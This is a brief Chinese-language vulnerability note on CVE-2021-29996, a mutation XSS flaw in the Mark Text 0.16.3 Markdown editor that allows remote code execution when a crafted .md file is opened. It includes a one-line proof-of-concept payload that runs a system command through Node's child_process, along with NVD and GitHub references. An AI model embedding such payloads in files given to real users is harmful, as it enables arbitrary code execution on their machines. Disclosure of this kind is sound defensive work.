# Mark Text Markdown 编辑器RCE(CVE-2021-29996)
Mark Text 0.16.3可以使攻击者任意执行命令。通过打开包含变异跨站脚本(XSS)Payload的.md文件,这可能导致远程执行代码(RCE)。
PoC:
```<style/onload=require('child_process').exec('calc')>
ref:
* https://nvd.nist.gov/vuln/detail/CVE-2021-29996
* https://github.com/marktext/marktext/issues/2548